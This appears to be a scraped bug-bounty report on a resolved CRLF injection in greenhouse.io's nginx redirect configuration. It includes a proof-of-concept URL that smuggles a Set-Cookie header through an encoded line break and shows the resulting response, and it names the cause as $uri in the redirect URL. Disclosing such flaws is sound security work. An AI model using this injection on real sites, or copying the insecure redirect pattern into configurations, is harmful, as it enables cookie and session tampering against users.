Loading HuntDB...

[greenhouse.io] CRLF Injection / Insecure nginx configuration

G
Greenhouse.io
Submitted None
Reported by bobrov

Vulnerability Details

Technical details and impact analysis

PoC http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io HTTP Response: Location: http://www.greenhouse.io/ Set-Cookie:test=test;domain=.greenhouse.io Result: Creating cookie test=test on .greenhouse.io $uri or $document_uri is used in the redirection-URL.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted